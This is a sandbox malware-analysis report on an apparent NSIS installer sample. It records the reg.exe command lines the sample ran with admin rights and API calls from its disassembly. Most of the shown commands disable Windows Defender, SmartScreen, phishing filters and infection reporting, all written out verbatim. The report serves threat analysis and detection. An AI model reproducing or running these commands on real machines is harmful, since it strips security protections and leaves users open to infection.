Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	01:12:05
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Imagebase:	0x7ff7699e0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	01:12:06
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1339
Total number of Limit Nodes:	25

Executed Functions

Function 00403532 Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNELBASE(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\Desktop\4hIPvzV6a2.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

C:\Users\user\Desktop\4hIPvzV6a2.exe, xrefs: 00403A2F
1033, xrefs: 00403876
TMP, xrefs: 00403862
C:\Users\user\Desktop, xrefs: 00403972
Low, xrefs: 00403848
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
SeShutdownPrivilege, xrefs: 00403AD8
~nsu%X.tmp, xrefs: 004039A8
UXTHEME, xrefs: 00403620, 00403625, 0040362B
Error launching installer, xrefs: 004038FD
TEMP, xrefs: 0040385A
NSIS Error, xrefs: 00403695
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 00403927
\Temp, xrefs: 0040382C

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\4hIPvzV6a2.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 2017177436-4052740033
Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
FindFirstFileW.KERNELBASE(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

\*.*, xrefs: 00405CCE
pB, xrefs: 00405CBC
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-1023570929
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\, xrefs: 004068B4

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Function 00403C29 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403CAA
lstrlenW.KERNEL32(Del,?,?,?,Del,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
lstrcmpiW.KERNEL32(?,.exe,Del,?,?,?,Del,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(Del), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
